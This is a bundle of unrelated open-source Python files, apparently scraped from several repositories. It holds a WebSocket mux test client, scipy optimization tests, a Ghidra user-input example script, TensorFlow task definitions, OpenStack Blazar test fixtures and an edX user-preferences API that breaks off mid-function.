key + client_for_testing.WEBSOCKET_ACCEPT_UUID).digest()
expected_accept = base64.b64encode(original_expected_accept)
if accept != expected_accept:
raise Exception(
'Invalid Sec-WebSocket-Accept header: %r (expected) != %r '
'(actual)' % (accept, expected_accept))
try:
self._logical_channels_condition.acquire()
self._logical_channels[channel_id] = _LogicalChannelData()
self._logical_channels[channel_id].send_quota = send_quota
finally:
self._logical_channels_condition.release()
self._logger.debug('Logical channel %d established' % channel_id)
def _check_logical_channel_is_opened(self, channel_id):
if not self._is_active:
raise Exception('Mux client is not active')
if channel_id not in self._logical_channels:
raise Exception('Logical channel %d is not established.' %
channel_id)
def drop_channel(self, channel_id):
# TODO(bashi): Implement
pass
def send_flow_control(self, channel_id, replenished_quota):
self._check_logical_channel_is_opened(channel_id)
flow_control = _create_flow_control(channel_id, replenished_quota)
payload = _encode_channel_id(_CONTROL_CHANNEL_ID) + flow_control
# Replenish receive quota
try:
self._logical_channels_condition.acquire()
self._logical_channels[channel_id].receive_quota += (
replenished_quota)
finally:
self._logical_channels_condition.release()
self._stream.send_binary(payload)
def send_message(self, channel_id, message, end=True, binary=False):
self._check_logical_channel_is_opened(channel_id)
if binary:
first_byte = (end << 7) | client_for_testing.OPCODE_BINARY
else:
first_byte = (end << 7) | client_for_testing.OPCODE_TEXT
message = message.encode('utf-8')
try:
self._logical_channels_condition.acquire()
if self._logical_channels[channel_id].send_quota < len(message):
raise Exception('Send quota violation: %d < %d' % (
self._logical_channels[channel_id].send_quota,
len(message)))
self._logical_channels[channel_id].send_quota -= len(message)
finally:
self._logical_channels_condition.release()
payload = _encode_channel_id(channel_id) + chr(first_byte) + message
self._stream.send_binary(payload)
def assert_receive(self, channel_id, payload, binary=False):
self._check_logical_channel_is_opened(channel_id)
try:
inner_frame = self._logical_channels[channel_id].queue.get(
timeout=self._timeout)
except Queue.Empty:
raise Exception('Cannot receive message from channel id %d' %
channel_id)
if binary:
opcode = client_for_testing.OPCODE_BINARY
else:
opcode = client_for_testing.OPCODE_TEXT
if inner_frame.opcode != opcode:
raise Exception('Unexpected opcode received (%r != %r)' %
(opcode, inner_frame.opcode))
if inner_frame.payload != payload:
raise Exception('Unexpected payload received')
def send_close(self, channel_id, code=None, reason=''):
self._check_logical_channel_is_opened(channel_id)
if code is not None:
body = struct.pack('!H', code) + reason.encode('utf-8')
else:
body = ''
first_byte = (1 << 7) | client_for_testing.OPCODE_CLOSE
payload = _encode_channel_id(channel_id) + chr(first_byte) + body
self._stream.send_binary(payload)
def assert_receive_close(self, channel_id):
self._check_logical_channel_is_opened(channel_id)
try:
inner_frame = self._logical_channels[channel_id].queue.get(
timeout=self._timeout)
except Queue.Empty:
raise Exception('Cannot receive message from channel id %d' %
channel_id)
if inner_frame.opcode != client_for_testing.OPCODE_CLOSE:
raise Exception('Didn\'t receive close frame')
def send_physical_connection_close(self, code=None, reason=''):
self._physical_connection_close_event = threading.Event()
self._stream.send_close(code, reason)
# This method can be used only after calling
# send_physical_connection_close().
def assert_physical_connection_receive_close(
self, code=client_for_testing.STATUS_NORMAL_CLOSURE, reason=''):
self._physical_connection_close_event.wait(timeout=self._timeout)
if (not self._physical_connection_close_event.isSet() or
not self._physical_connection_close_message):
raise Exception('Didn\'t receive closing handshake')
def close_socket(self):
self._is_active = False
self._socket.close()
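# Added end-to-end usage sketch (hedged; `options` is the client_for_testing
# style options object built by the test harness, outside this file):
#   client = MuxClient(options)
#   client.connect()                   # physical handshake + default channel
#   client.add_channel(2, options)     # AddChannelRequest/-Response exchange
#   client.send_message(2, 'hello')
#   client.assert_receive(2, 'hello')  # assumes an echo server
#   client.send_close(2)
#   client.close_socket()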
| apache-2.0 |
Javiercerna/MissionPlanner | Lib/site-packages/scipy/optimize/tests/test_minpack.py | 55 | 9863 | """
Unit tests for optimization routines from minpack.py.
"""
from numpy.testing import assert_, assert_almost_equal, assert_array_equal, \
assert_array_almost_equal, TestCase, run_module_suite, assert_raises
import numpy as np
from numpy import array, float64
from scipy import optimize
from scipy.optimize.minpack import leastsq, curve_fit, fixed_point
class ReturnShape(object):
"""This class exists to create a callable that does not have a 'func_name' attribute.
__init__ takes the argument 'shape', which should be a tuple of ints. When an instance
is called with a single argument 'x', it returns numpy.ones(shape).
"""
def __init__(self, shape):
self.shape = shape
def __call__(self, x):
return np.ones(self.shape)
def dummy_func(x, shape):
"""A function that returns an array of ones of the given shape.
`x` is ignored.
"""
return np.ones(shape)
class TestFSolve(object):
def pressure_network(self, flow_rates, Qtot, k):
"""Evaluate non-linear equation system representing
the pressures and flows in a system of n parallel pipes::
f_i = P_i - P_0, for i = 1..n
f_0 = sum(Q_i) - Qtot
Where Q_i is the flow rate in pipe i and P_i the pressure in that pipe.
Pressure is modeled as a P=kQ**2 where k is a valve coefficient and
Q is the flow rate.
Parameters
----------
flow_rates : float
A 1D array of n flow rates [kg/s].
k : float
A 1D array of n valve coefficients [1/kg m].
Qtot : float
A scalar, the total input flow rate [kg/s].
Returns
-------
F : float
A 1D array, F[i] == f_i.
"""
P = k * flow_rates**2
F = np.hstack((P[1:] - P[0], flow_rates.sum() - Qtot))
return F
def pressure_network_jacobian(self, flow_rates, Qtot, k):
"""Return the jacobian of the equation system F(flow_rates)
computed by `pressure_network` with respect to
*flow_rates*. See `pressure_network` for the detailed
description of parameters.
Returns
-------
jac : float
*n* by *n* matrix ``df_i/dQ_j`` where ``n = len(flow_rates)``
and *f_i* and *Q_i* are described in the doc for `pressure_network`
"""
n = len(flow_rates)
pdiff = np.diag(flow_rates[1:] * 2 * k[1:] - 2 * flow_rates[0] * k[0])
jac = np.empty((n, n))
jac[:n-1, :n-1] = pdiff
jac[:n-1, n-1] = 0
jac[n-1, :] = np.ones(n)
return jac
def test_pressure_network_no_gradient(self):
"""fsolve without gradient, equal pipes -> equal flows"""
k = np.ones(4) * 0.5
Qtot = 4
initial_guess = array([2., 0., 2., 0.])
final_flows = optimize.fsolve(
self.pressure_network, initial_guess, args=(Qtot, k))
assert_array_almost_equal(final_flows, np.ones(4))
def test_pressure_network_with_gradient(self):
"""fsolve with gradient, equal pipes -> equal flows"""
k = np.ones(4) * 0.5
Qtot = 4
initial_guess = array([2., 0., 2., 0.])
final_flows = optimize.fsolve(
self.pressure_network, initial_guess, args=(Qtot, k),
fprime=self.pressure_network_jacobian)
assert_array_almost_equal(final_flows, np.ones(4))
def test_wrong_shape_func_callable(self):
"""The callable 'func' has no 'func_name' attribute."""
func = ReturnShape(1)
# x0 is a list of two elements, but func will return an array with
# length 1, so this should result in a TypeError.
x0 = [1.5, 2.0]
assert_raises(TypeError, optimize.fsolve, func, x0)
def test_wrong_shape_func_function(self):
# x0 is a list of two elements, but func will return an array with
# length 1, so this should result in a TypeError.
x0 = [1.5, 2.0]
assert_raises(TypeError, optimize.fsolve, dummy_func, x0, args=((1,),))
def test_wrong_shape_fprime_callable(self):
"""The callables 'func' and 'deriv_func' have no 'func_name' attribute."""
func = ReturnShape(1)
deriv_func = ReturnShape((2,2))
assert_raises(TypeError, optimize.fsolve, func, x0=[0,1], fprime=deriv_func)
def test_wrong_shape_fprime_function(self):
func = lambda x: dummy_func(x, (2,))
deriv_func = lambda x: dummy_func(x, (3,3))
assert_raises(TypeError, optimize.fsolve, func, x0=[0,1], fprime=deriv_func)
class TestLeastSq(TestCase):
def setUp(self):
x = np.linspace(0, 10, 40)
a,b,c = 3.1, 42, -304.2
self.x = x
self.abc = a,b,c
y_true = a*x**2 + b*x + c
np.random.seed(0)
self.y_meas = y_true + 0.01*np.random.standard_normal(y_true.shape)
def residuals(self, p, y, x):
a,b,c = p
err = y-(a*x**2 + b*x + c)
return err
def test_basic(self):
p0 = array([0,0,0])
params_fit, ier = leastsq(self.residuals, p0,
args=(self.y_meas, self.x))
assert_(ier in (1,2,3,4), 'solution not found (ier=%d)'%ier)
# low precision due to random
assert_array_almost_equal(params_fit, self.abc, decimal=2)
def test_full_output(self):
p0 = array([0,0,0])
full_output = leastsq(self.residuals, p0,
args=(self.y_meas, self.x),
full_output=True)
params_fit, cov_x, infodict, mesg, ier = full_output
assert_(ier in (1,2,3,4), 'solution not found: %s'%mesg)
def test_input_untouched(self):
p0 = array([0,0,0],dtype=float64)
p0_copy = array(p0, copy=True)
full_output = leastsq(self.residuals, p0,
args=(self.y_meas, self.x),
full_output=True)
params_fit, cov_x, infodict, mesg, ier = full_output
assert_(ier in (1,2,3,4), 'solution not found: %s'%mesg)
assert_array_equal(p0, p0_copy)
def test_wrong_shape_func_callable(self):
"""The callable 'func' has no 'func_name' attribute."""
func = ReturnShape(1)
# x0 is a list of two elements, but func will return an array with
# length 1, so this should result in a TypeError.
x0 = [1.5, 2.0]
assert_raises(TypeError, optimize.leastsq, func, x0)
def test_wrong_shape_func_function(self):
# x0 is a list of two elements, but func will return an array with
# length 1, so this should result in a TypeError.
x0 = [1.5, 2.0]
assert_raises(TypeError, optimize.leastsq, dummy_func, x0, args=((1,),))
def test_wrong_shape_Dfun_callable(self):
"""The callables 'func' and 'deriv_func' have no 'func_name' attribute."""
func = ReturnShape(1)
deriv_func = ReturnShape((2,2))
assert_raises(TypeError, optimize.leastsq, func, x0=[0,1], Dfun=deriv_func)
def test_wrong_shape_Dfun_function(self):
func = lambda x: dummy_func(x, (2,))
deriv_func = lambda x: dummy_func(x, (3,3))
assert_raises(TypeError, optimize.leastsq, func, x0=[0,1], Dfun=deriv_func)
class TestCurveFit(TestCase):
def setUp(self):
self.y = array([1.0, 3.2, 9.5, 13.7])
self.x = array([1.0, 2.0, 3.0, 4.0])
def test_one_argument(self):
def func(x,a):
return x**a
popt, pcov = curve_fit(func, self.x, self.y)
assert_(len(popt) == 1)
assert_(pcov.shape == (1,1))
assert_almost_equal(popt[0], 1.9149, decimal=4)
assert_almost_equal(pcov[0,0], 0.0016, decimal=4)
def test_two_argument(self):
def func(x, a, b):
return b*x**a
popt, pcov = curve_fit(func, self.x, self.y)
assert_(len(popt) == 2)
assert_(pcov.shape == (2,2))
assert_array_almost_equal(popt, [1.7989, 1.1642], decimal=4)
assert_array_almost_equal(pcov, [[0.0852, -0.1260],[-0.1260, 0.1912]], decimal=4)
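# Added note (hedged): pcov is curve_fit's estimated covariance of popt, so
# the one-sigma parameter errors implied by the checks above would be
# np.sqrt(np.diag(pcov)).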
class TestFixedPoint(TestCase):
def test_scalar_trivial(self):
"""f(x) = 2x; fixed point should be x=0"""
def func(x):
return 2.0*x
x0 = 1.0
x = fixed_point(func, x0)
assert_almost_equal(x, 0.0)
def test_scalar_basic1(self):
"""f(x) = x**2; x0=1.05; fixed point should be x=1"""
def func(x):
return x**2
x0 = 1.05
x = fixed_point(func, x0)
assert_almost_equal(x, 1.0)
def test_scalar_basic2(self):
"""f(x) = x**0.5; x0=1.05; fixed point should be x=1"""
def func(x):
return x**0.5
x0 = 1.05
x = fixed_point(func, x0)
assert_almost_equal(x, 1.0)
def test_array_trivial(self):
def func(x):
return 2.0*x
x0 = [0.3, 0.15]
olderr = np.seterr(all='ignore')
try:
x = fixed_point(func, x0)
finally:
np.seterr(**olderr)
assert_almost_equal(x, [0.0, 0.0])
def test_array_basic1(self):
"""f(x) = c * x**2; fixed point should be x=1/c"""
def func(x, c):
return c * x**2
c = array([0.75, 1.0, 1.25])
x0 = [1.1, 1.15, 0.9]
olderr = np.seterr(all='ignore')
try:
x = fixed_point(func, x0, args=(c,))
finally:
np.seterr(**olderr)
assert_almost_equal(x, 1.0/c)
def test_array_basic2(self):
"""f(x) = c * x**0.5; fixed point should be x=c**2"""
def func(x, c):
return c * x**0.5
c = array([0.75, 1.0, 1.25])
x0 = [0.8, 1.1, 1.1]
x = fixed_point(func, x0, args=(c,))
assert_almost_equal(x, c**2)
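# Added note (hedged): fixed_point solves f(x) == x by iterating from x0 with
# Aitken's del-squared convergence acceleration (Steffensen's method), which
# is why the cases above converge even where plain iteration would crawl.
# Minimal standalone use, mirroring test_scalar_basic2:
def _example_fixed_point():
    x = fixed_point(lambda v: v ** 0.5, 1.05)
    assert_almost_equal(x, 1.0)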
if __name__ == "__main__":
run_module_suite()
| gpl-3.0 |
NationalSecurityAgency/ghidra | Ghidra/Features/Python/ghidra_scripts/AskScriptPy.py | 1 | 4185 | ## ###
# IP: GHIDRA
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##
# An example of asking for user input.
# Note the ability to pre-populate values for some of these variables when an AskScript.properties file exists.
# Also notice how the previous input is saved.
# DISCLAIMER: This is a recreation of a Java Ghidra script for example
# use only. Please run the Java version in a production environment.
#@category Examples.Python
from ghidra.framework.model import DomainFile
from ghidra.framework.model import DomainFolder
from ghidra.program.model.address import Address
from ghidra.program.model.lang import LanguageCompilerSpecPair
from ghidra.program.model.listing import Program
from ghidra.util import Msg
from java.lang import IllegalArgumentException
# The presence of the AskScript.properties file in the same location (as AskScript.java)
# allows for the following behavior:
# - GUI: if applicable, auto-populates the input field with the value in the
# .properties file (the first time that input field appears)
# - Headless: uses the value in the .properties file for the variable assigned to the
# corresponding askXxx() method in the GhidraScript.
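# Illustrative only: the key syntax below is an assumption modeled on the
# Java AskScript.properties bundled with Ghidra (keys combine each dialog's
# title and message, with spaces escaped per Java properties rules):
#   integer\ 1 enter\ integer\ 1 = 4
#   integer\ 2 enter\ integer\ 2 = 5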
try:
file1 = askFile("FILE", "Choose file:")
print "file was: " + str(file1)
directory1 = askDirectory("Directory", "Choose directory:")
print "directory was: " + str(directory1)
lang = askLanguage("Language Picker", "I want this one!")
print "language was: " + lang.toString()
domFolder = askProjectFolder("Please pick a domain folder!")
print "domFolder was: " + domFolder.getName()
int1 = askInt("integer 1", "enter integer 1")
int2 = askInt("integer 2", "enter integer 2")
print "int1 + int2 = " + str(int1 + int2)
long1 = askLong("long 1", "enter long 1")
long2 = askLong("long 2", "enter long 2")
print "long1 + long2 = " + str(long1 + long2)
address1 = askAddress("address 1", "enter address 1")
address2 = askAddress("address 2", "enter address 2")
print "address1 + address2 = " + address1.add(address2.getOffset()).toString()
#bytes = askBytes("bytes", "enter byte pattern")
#for b in bytes:
# print "b = " + str(b & 0xff)
prog = askProgram("Please choose a program to open.")
print "Program picked: " + prog.getName()
domFile = askDomainFile("Which domain file would you like?")
print "Domain file: " + domFile.getName()
d1 = askDouble("double 1", "enter double 1")
d2 = askDouble("double 2", "enter double 2")
print "d1 + d2 = " + str(d1 + d2)
myStr = askString("String Specification", "Please type a string: ")
myOtherStr = askString("Another String Specification", "Please type another string: ", "replace me!")
print "You typed: " + myStr + " and " + myOtherStr
choice = askChoice("Choice", "Please choose one", [ "grumpy", "dopey", "sleepy", "doc", "bashful" ], "bashful")
print "Choice? " + choice
choices1 = askChoices("Choices 1", "Please choose one or more numbers.", [ 1, 2, 3, 4, 5, 6 ])
print "Choices 1: "
for intChoice in choices1:
print str(intChoice) + " "
print ""
choices2 = askChoices("Choices 2", "Please choose one or more of the following.",
[ 1.1, 2.2, 3.3, 4.4, 5.5, 6.6 ], ["Part 1", "Part 2", "Part 3", "Part 4", "Part 5", "Part 6" ])
print "Choices 2: "
for intChoice in choices2:
print str(intChoice) + " "
print ""
yesOrNo = askYesNo("yes or no", "is this a yes/no question?")
print "Yes or No? " + str(yesOrNo)
except IllegalArgumentException as error:
Msg.warn(self, "Error during headless processing: " + error.toString())
| apache-2.0 |
derekjchow/models | research/cvt_text/task_specific/task_definitions.py | 5 | 2961 | # Copyright 2018 The TensorFlow Authors All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Defines all the tasks the model can learn."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
from base import embeddings
from task_specific.word_level import depparse_module
from task_specific.word_level import depparse_scorer
from task_specific.word_level import tagging_module
from task_specific.word_level import tagging_scorers
from task_specific.word_level import word_level_data
class Task(object):
__metaclass__ = abc.ABCMeta
def __init__(self, config, name, loader):
self.config = config
self.name = name
self.loader = loader
self.train_set = self.loader.get_dataset("train")
self.val_set = self.loader.get_dataset("dev" if config.dev_set else "test")
@abc.abstractmethod
def get_module(self, inputs, encoder):
pass
@abc.abstractmethod
def get_scorer(self):
pass
class Tagging(Task):
def __init__(self, config, name, is_token_level=True):
super(Tagging, self).__init__(
config, name, word_level_data.TaggedDataLoader(
config, name, is_token_level))
self.n_classes = len(set(self.loader.label_mapping.values()))
self.is_token_level = is_token_level
def get_module(self, inputs, encoder):
return tagging_module.TaggingModule(
self.config, self.name, self.n_classes, inputs, encoder)
def get_scorer(self):
if self.is_token_level:
return tagging_scorers.AccuracyScorer()
else:
return tagging_scorers.EntityLevelF1Scorer(self.loader.label_mapping)
class DependencyParsing(Tagging):
def __init__(self, config, name):
super(DependencyParsing, self).__init__(config, name, True)
def get_module(self, inputs, encoder):
return depparse_module.DepparseModule(
self.config, self.name, self.n_classes, inputs, encoder)
def get_scorer(self):
return depparse_scorer.DepparseScorer(
self.n_classes, (embeddings.get_punctuation_ids(self.config)))
def get_task(config, name):
if name in ["ccg", "pos"]:
return Tagging(config, name, True)
elif name in ["chunk", "ner", "er"]:
return Tagging(config, name, False)
elif name == "depparse":
return DependencyParsing(config, name)
else:
raise ValueError("Unknown task", name)
| apache-2.0 |
openstack/blazar | blazar/tests/__init__.py | 3 | 2729 | # Copyright (c) 2013 Bull.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import tempfile
import fixtures
import testscenarios
from oslo_config import cfg
from oslo_log import log as logging
from oslotest import base
from blazar import context
from blazar.db.sqlalchemy import api as db_api
from blazar.db.sqlalchemy import facade_wrapper
cfg.CONF.set_override('use_stderr', False)
logging.setup(cfg.CONF, 'blazar')
_DB_CACHE = None
class Database(fixtures.Fixture):
def setUp(self):
super(Database, self).setUp()
fd = tempfile.NamedTemporaryFile(delete=False)
self.db_path = fd.name
database_connection = 'sqlite:///' + self.db_path
cfg.CONF.set_override('connection', str(database_connection),
group='database')
facade_wrapper._clear_engine()
self.engine = facade_wrapper.get_engine()
db_api.setup_db()
self.addCleanup(db_api.drop_db)
class TestCase(testscenarios.WithScenarios, base.BaseTestCase):
"""Test case base class for all unit tests.
Due to the slowness of DB access, this class does not support DB tests.
If needed, please inherit from DBTestCase instead.
"""
def setUp(self):
"""Run before each test method to initialize test environment."""
super(TestCase, self).setUp()
self.context_mock = None
cfg.CONF(args=[], project='blazar')
def patch(self, obj, attr):
"""Returns a Mocked object on the patched attribute."""
mockfixture = self.useFixture(fixtures.MockPatchObject(obj, attr))
return mockfixture.mock
def set_context(self, ctx):
if self.context_mock is None:
self.context_mock = self.patch(context.BlazarContext, 'current')
self.context_mock.return_value = ctx
class DBTestCase(TestCase):
"""Test case base class for all database unit tests.
`DBTestCase` differs from TestCase in that DB access is supported.
Only tests needing DB support should inherit from this class.
"""
def setUp(self):
super(DBTestCase, self).setUp()
global _DB_CACHE
if not _DB_CACHE:
_DB_CACHE = Database()
self.useFixture(_DB_CACHE)
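# Added sketch (hypothetical subclasses) of the intended split:
#   class ExamplePureTest(TestCase):      # plain unit test, no DB fixture
#       def test_something_pure(self):
#           ...
#   class ExampleDBTest(DBTestCase):      # runs against the SQLite fixture
#       def test_something_with_db(self):
#           ...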
| apache-2.0 |
playm2mboy/edx-platform | openedx/core/djangoapps/user_api/preferences/api.py | 3 | 16995 | """
API for managing user preferences.
"""
import logging
import analytics
from eventtracking import tracker
from django.conf import settings
from django.core.exceptions import ObjectDoesNotExist
from django.db import IntegrityError
from django.utils.translation import ugettext as _
from django.utils.translation import ugettext_noop
from student.models import User, UserProfile
from request_cache import get_request_or_stub
from ..errors import (
UserAPIInternalError, UserAPIRequestError, UserNotFound, UserNotAuthorized,
PreferenceValidationError, PreferenceUpdateError
)
from ..helpers import intercept_errors
from ..models import UserOrgTag, UserPreference
from ..serializers import UserSerializer, RawUserPreferenceSerializer
log = logging.getLogger(__name__)
@intercept_errors(UserAPIInternalError, ignore_errors=[UserAPIRequestError])
def get_user_preference(requesting_user, preference_key, username=None):
"""Returns the value of the user preference with the specified key.
Args:
requesting_user (User): The user requesting the user preferences. Only the user with username
`username` or users with "is_staff" privileges can access the preferences.
preference_key (str): The key for the user preference.
username (str): Optional username for which to look up the preferences. If not specified,
`requesting_user.username` is assumed.
Returns:
The value for the user preference which is always a string, or None if a preference
has not been specified.
Raises:
UserNotFound: no user with username `username` exists (or `requesting_user.username` if
`username` is not specified)
UserNotAuthorized: the requesting_user does not have access to the user preference.
UserAPIInternalError: the operation failed due to an unexpected error.
"""
existing_user = _get_user(requesting_user, username, allow_staff=True)
return UserPreference.get_value(existing_user, preference_key)
@intercept_errors(UserAPIInternalError, ignore_errors=[UserAPIRequestError])
def get_user_preferences(requesting_user, username=None):
"""Returns all user preferences as a JSON response.
Args:
requesting_user (User): The user requesting the user preferences. Only the user with username
`username` or users with "is_staff" privileges can access the preferences.
username (str): Optional username for which to look up the preferences. If not specified,
`requesting_user.username` is assumed.
Returns:
A dict containing account fields.
Raises:
UserNotFound: no user with username `username` exists (or `requesting_user.username` if
`username` is not specified)
UserNotAuthorized: the requesting_user does not have access to the user preference.
UserAPIInternalError: the operation failed due to an unexpected error.
"""
existing_user = _get_user(requesting_user, username, allow_staff=True)
# Django Rest Framework V3 uses the current request to version
# hyperlinked URLS, so we need to retrieve the request and pass
# it in the serializer's context (otherwise we get an AssertionError).
# We're retrieving the request from the cache rather than passing it in
# as an argument because this is an implementation detail of how we're
# serializing data, which we want to encapsulate in the API call.
context = {
"request": get_request_or_stub()
}
user_serializer = UserSerializer(existing_user, context=context)
return user_serializer.data["preferences"]
@intercept_errors(UserAPIInternalError, ignore_errors=[UserAPIRequestError])
def update_user_preferences(requesting_user, update, username=None):
"""Update the user preferences for the given username.
Note:
It is up to the caller of this method to enforce the contract that this method is only called
with the user who made the request.
Arguments:
requesting_user (User): The user requesting to modify account information. Only the user with username
'username' has permissions to modify account information.
update (dict): The updated account field values.
Some notes:
Values are expected to be strings. Non-string values will be converted to strings.
Null values for a preference will be treated as a request to delete the key in question.
username (str): Optional username specifying which account should be updated. If not specified,
`requesting_user.username` is assumed.
Raises:
UserNotFound: no user with username `username` exists (or `requesting_user.username` if
`username` is not specified)
UserNotAuthorized: the requesting_user does not have access to change the account
associated with `username`
PreferenceValidationError: the update was not attempted because validation errors were found
PreferenceUpdateError: the operation failed when performing the update.
UserAPIInternalError: the operation failed due to an unexpected error.
"""
existing_user = _get_user(requesting_user, username)
# First validate each preference setting
errors = {}
serializers = {}
for preference_key in update.keys():
preference_value = update[preference_key]
if preference_value is not None:
try:
serializer = create_user_preference_serializer(existing_user, preference_key, preference_value)
validate_user_preference_serializer(serializer, preference_key, preference_value)
serializers[preference_key] = serializer
except PreferenceValidationError as error:
preference_error = error.preference_errors[preference_key]
errors[preference_key] = {
"developer_message": preference_error["developer_message"],
"user_message": preference_error["user_message"],
}
if errors:
raise PreferenceValidationError(errors)
# Then perform the patch
for preference_key in update.keys():
preference_value = update[preference_key]
if preference_value is not None:
try:
serializer = serializers[preference_key]
serializer.save()
except Exception as error:
raise _create_preference_update_error(preference_key, preference_value, error)
else:
delete_user_preference(requesting_user, preference_key)
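# Added usage sketch (hedged; the preference keys shown are illustrative).
# Per the docstring above, a None value deletes the key:
#   update_user_preferences(
#       request.user,
#       {"pref-lang": "en", "time_zone": None},  # set one, delete the other
#   )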
@intercept_errors(UserAPIInternalError, ignore_errors=[UserAPIRequestError])
def set_user_preference(requesting_user, preference_key, preference_value, username=None):
"""Update a user preference for the given username.
Note:
It is up to the caller of this method to enforce the contract that this method is only called
with the user who made the request.
Arguments:
requesting_user (User): The user requesting to modify account information. Only the user with username
'username' has permissions to modify account information.
preference_key (str): The key for the user preference.
preference_value (str): The value to be stored. Non-string values will be converted to strings.
username (str): Optional username specifying which account should be updated. If not specified,
`requesting_user.username` is assumed.
Raises:
UserNotFound: no user with username `username` exists (or `requesting_user.username` if
`username` is not specified)
UserNotAuthorized: the requesting_user does not have access to change the account
associated with `username`
PreferenceValidationError: the update was not attempted because validation errors were found
PreferenceUpdateError: the operation failed when performing the update.
UserAPIInternalError: the operation failed due to an unexpected error.
"""
existing_user = _get_user(requesting_user, username)
serializer = create_user_preference_serializer(existing_user, preference_key, preference_value)
validate_user_preference_serializer(serializer, preference_key, preference_value)
try:
serializer.save()
except Exception as error:
raise _create_preference_update_error(preference_key, preference_value, error)
@intercept_errors(UserAPIInternalError, ignore_errors=[UserAPIRequestError])
def delete_user_preference(requesting_user, preference_key, username=None):
"""Deletes a user preference on behalf of a requesting user.
Note:
It is up to the caller of this method to enforce the contract that this method is only called
with the user who made the request.
Arguments:
requesting_user (User): The user requesting to delete the preference. Only the user with username
'username' has permissions to delete their own preference.
preference_key (str): The key for the user preference.
username (str): Optional username specifying which account should be updated. If not specified,
`requesting_user.username` is assumed.
Returns:
True if the preference was deleted, False if the user did not have a preference with the supplied key.
Raises:
UserNotFound: no user with username `username` exists (or `requesting_user.username` if
`username` is not specified)
UserNotAuthorized: the requesting_user does not have access to change the account
associated with `username`
PreferenceUpdateError: the operation failed when performing the update.
UserAPIInternalError: the operation failed due to an unexpected error.
"""
existing_user = _get_user(requesting_user, username)
try:
user_preference = UserPreference.objects.get(user=existing_user, key=preference_key)
except ObjectDoesNotExist:
return False
try:
user_preference.delete()
except Exception as error:
raise PreferenceUpdateError(
developer_message=u"Delete failed for user preference '{preference_key}': {error}".format(
preference_key=preference_key, error=error
),
user_message=_(u"Delete failed for user preference '{preference_key}'.").format(
preference_key=preference_key
),
)
return True
@intercept_errors(UserAPIInternalError, ignore_errors=[UserAPIRequestError])
def update_email_opt_in(user, org, opt_in):
"""Updates a user's preference for receiving org-wide emails.
Sets a User Org Tag defining the choice to opt in or opt out of organization-wide
emails.
Arguments:
user (User): The user to set a preference for.
org (str): The org is used to determine the organization this setting is related to.
opt_in (bool): True if the user is choosing to receive emails for this organization.
If the user requires parental consent then email-optin is set to False regardless.
Returns:
None
Raises:
UserNotFound: no user profile exists for the specified user.
"""
preference, _ = UserOrgTag.objects.get_or_create(
user=user, org=org, key='email-optin'
)
# If the user requires parental consent, then don't allow opt-in
try:
user_profile = UserProfile.objects.get(user=user)
except ObjectDoesNotExist:
raise UserNotFound()
if user_profile.requires_parental_consent(
age_limit=getattr(settings, 'EMAIL_OPTIN_MINIMUM_AGE', 13),
default_requires_consent=False,
):
opt_in = False
# Update the preference and save it
preference.value = str(opt_in)
try:
preference.save()
if settings.SEGMENT_KEY:
_track_update_email_opt_in(user.id, org, opt_in)
except IntegrityError as err:
log.warn(u"Could not update organization wide preference due to IntegrityError: {}".format(err.message))
def _track_update_email_opt_in(user_id, organization, opt_in):
"""Track an email opt-in preference change.
Arguments:
user_id (str): The ID of the user making the preference change.
organization (str): The organization whose emails are being opted into or out of by the user.
opt_in (bool): Whether the user has chosen to opt-in to emails from the organization.
Returns:
None
"""
event_name = 'edx.bi.user.org_email.opted_in' if opt_in else 'edx.bi.user.org_email.opted_out'
tracking_context = tracker.get_tracker().resolve_context()
analytics.track(
user_id,
event_name,
{
'category': 'communication',
'label': organization
},
context={
'Google Analytics': {
'clientId': tracking_context.get('client_id')
}
}
)
def _get_user(requesting_user, username=None, allow_staff=False):
"""
Helper method to return the user for a given username.
If username is not provided, requesting_user.username is assumed.
"""
if username is None:
username = requesting_user.username
try:
existing_user = User.objects.get(username=username)
except ObjectDoesNotExist:
raise UserNotFound()
if requesting_user.username != username:
if not requesting_user.is_staff or not allow_staff:
raise UserNotAuthorized()
return existing_user
def create_user_preference_serializer(user, preference_key, preference_value):
"""Creates a serializer for the specified user preference.
Arguments:
user (User): The user whose preference is being serialized.
preference_key (str): The key for the user preference.
preference_value (str): The value to be stored. Non-string values will be converted to strings.
Returns:
A serializer that can be used to save the user preference.
"""
try:
existing_user_preference = UserPreference.objects.get(user=user, key=preference_key)
except ObjectDoesNotExist:
existing_user_preference = None
new_data = {
"user": user.id,
"key": preference_key,
"value": preference_value,
}
if existing_user_preference:
serializer = RawUserPreferenceSerializer(existing_user_preference, data=new_data)
else:
serializer = RawUserPreferenceSerializer(data=new_data)
return serializer
def validate_user_preference_serializer(serializer, preference_key, preference_value):
"""Validates a user preference serializer.
Arguments:
serializer (UserPreferenceSerializer): The serializer to be validated.
preference_key (str): The key for the user preference.
preference_value (str): The value to be stored. Non-string values will be converted to strings.
Raises:
PreferenceValidationError: the supplied key and/or value for a user preference are invalid.
"""
if preference_value is None or unicode(preference_value).strip() == '':
format_string = ugettext_noop(u"Preference '{preference_key}' cannot be set to an empty value.")
raise PreferenceValidationError({
preference_key: {
"developer_message": format_string.format(preference_key=preference_key),
"user_message": _(format_string).format(preference_key=preference_key)
}
})
if not serializer.is_valid():
developer_message = u"Value '{preference_value}' not valid for preference '{preference_key}': {error}".format(
